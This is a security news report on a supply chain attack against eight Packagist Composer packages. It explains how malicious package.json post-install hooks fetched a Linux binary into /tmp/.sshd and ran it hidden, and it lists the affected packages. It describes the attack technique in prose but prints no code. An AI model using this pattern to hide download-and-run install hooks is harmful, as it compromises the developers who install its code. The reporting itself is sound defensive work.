A recent coordinated supply chain attack has compromised eight packages on Packagist, utilizing malicious code that executes a Linux binary sourced from a GitHub Releases URL. This incident highlights significant vulnerabilities within the software distribution ecosystem.
Details of the Attack
The affected packages, all Composer packages, were infiltrated through an unusual method. The malicious code was inserted into package.json, rather than the more commonly scrutinized composer.json. This approach targeted projects that incorporate JavaScript build tools alongside PHP code, evading detection by those focusing solely on Composer-related metadata.
This strategic cross-ecosystem insertion poses challenges for developers and security teams, as it exploits lifecycle hooks within package.json that may be overlooked during standard PHP dependency scans. Although the malicious versions have been removed from Packagist, the breach underscores the need for comprehensive security practices.
Technical Analysis and Package Impact
Analysis reveals that the upstream repositories of these packages were altered to include a post-install script. This script attempts to download a Linux binary from a specified GitHub Releases URL, saving it to the /tmp/.sshd directory, modifying permissions to enable execution by all users, and operating it in the background.
The following packages and their respective versions were impacted:
- moritz-sauer-13/silverstripe-cms-theme (dev-master)
- crosiersource/crosierlib-base (dev-master)
- devdojo/wave (dev-main)
- devdojo/genesis (dev-main)
- katanaui/katana (dev-main)
- elitedevsquad/sidecar-laravel (3.x-dev)
- r2luna/brain (dev-main)
- baskarcm/tzi-chat-ui (dev-main)
Broader Implications and Unclear Payloads
Further investigation by Socket has uncovered references to this payload in 777 files across GitHub, indicating a potentially larger campaign. However, the exact extent of these breaches—whether they represent unique compromises, forks, or other forms of duplication—remains uncertain.
The payload was activated via package.json post-install scripts for package artifacts and was embedded within GitHub Actions workflows. The precise function of the payload downloaded from GitHub is unknown, as the account hosting it is no longer active. The malware was named “gvfsd-network,” referencing a GNOME Virtual File System daemon, which manages network shares.
Despite the absence of a second-stage binary, the dangerous installer warrants immediate attention. It enables remote code execution during installation or build processes, obscuring its operations by disabling TLS verification, suppressing errors, and executing downloaded binaries discreetly.
This incident serves as a critical reminder of the importance of vigilant security practices and the need for multi-layered defense strategies to protect against evolving cyber threats.
